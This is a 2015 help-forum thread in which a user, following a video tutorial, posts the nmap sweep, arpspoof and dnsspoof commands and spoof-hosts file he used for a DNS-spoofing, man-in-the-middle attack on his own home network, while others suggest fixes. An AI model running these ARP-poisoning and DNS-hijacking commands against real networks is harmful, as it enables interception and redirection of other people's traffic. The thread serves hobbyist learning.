DNS Spoofing and MITM Attack|Help

0 Colin Hemmi · October 4, 2015
Hello,
I just watched Buckys Video  about DNS Spoofing and MITM Attacks. When I entered

apt-get install bridge-utils

This appeared:
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package bridge-utils is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source

E: Package 'bridge-utils' has no installation candidate




What have I done wrong?
Greetings Colin

Post a Reply

Replies

Oldest  Newest  Rating
0 Colin Hemmi · October 6, 2015
Thanks this worked great.
0 Colin Hemmi · October 6, 2015
I still have a question, 

When I use nmap:nmap -sn 192.168.178.1-255

nmap -sn 192.168.178.1-255 

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-04 10:21 BST
Nmap scan report for fritz.box (192.168.178.1)
Host is up (0.0030s latency).
Nmap scan report for 192.168.178.31
Host is up (0.023s latency).
MAC Address: 38:94:96:D7:CF:31 (Samsung Elec Co.)
Nmap scan report for 192.168.178.50
Host is up (0.010s latency).
MAC Address: E8:E0:B7:E7:AD:EA (Toshiba)
Nmap scan report for 192.168.178.59
Host is up (0.036s latency).
MAC Address: 70:56:81:C8:1E:BA (Apple)
Nmap scan report for XboxOne.fritz.box (192.168.178.80)
Host is up (-0.15s latency).
MAC Address: 30:59:B7:C1:47:E3 (Microsoft)
Nmap scan report for kakteen.fritz.box (192.168.178.76)
Host is up.
Nmap done: 255 IP addresses (9 hosts up) scanned in 4.96 seconds




This comes and I can see the ip of my phone is 192.168.178.31 and the ip of my router is 192.168.178.1 I also got a .txt file.
192.168.178.76 www*

192.168.178.76 bacon.com

after that I enter apache2ctl start, the arpspoof and the dnsspoof.

apache2ctl start
root@kakteen:~# arpspoof -t 192.168.178.31 192.168.178.1 && arpspoof -t 192.168.178.1 192.168.178.31
0:22:fa:2b:f1:34 0:0:0:0:0:0 0806 42: arp reply 192.168.178.1 is-at 0:22:fa:2b:f1:34
0:22:fa:2b:f1:34 0:0:0:0:0:0 0806 42: arp reply 192.168.178.1 is-at 0:22:fa:2b:f1:34
0:22:fa:2b:f1:34 0:0:0:0:0:0 0806 42: arp reply 192.168.178.1 is-at 0:22:fa:2b:f1:34
0:22:fa:2b:f1:34 0:0:0:0:0:0 0806 42: arp reply 192.168.178.1 is-at 0:22:fa:2b:f1:34
0:22:fa:2b:f1:34 0:0:0:0:0:0 0806 42: arp reply 192.168.178.1 is-at 0:22:fa:2b:f1:34
0:22:fa:2b:f1:34 0:0:0:0:0:0 0806 42: arp reply 192.168.178.1 is-at 0:22:fa:2b:f1:34


dnsspoof -f Desktop/spoofhosts.txt host 192.168.178.31 and udp port 53

dnsspoof: listening on wlan0 [host 192.168.178.31 and udp port 53]


when i then go to bacon.com the real bacon.com site comes.
Greeting Colin
0 Miss Protocol · October 10, 2015
You need to configure ipforwarding. which linux box are you using? kali linux 2.0. ?
0 Ujwal Sah · October 28, 2015
i am having the same problem. i am using kali 2.0
0 Miss Protocol · October 30, 2015
kali 2.0 is buggy. use kali 1.1.0 or 1.0.9
  • 1

Networking

107,356 followers
About

Chat about routers, switches and firewalls, and more!

Links
Moderators
Bucky Roberts Administrator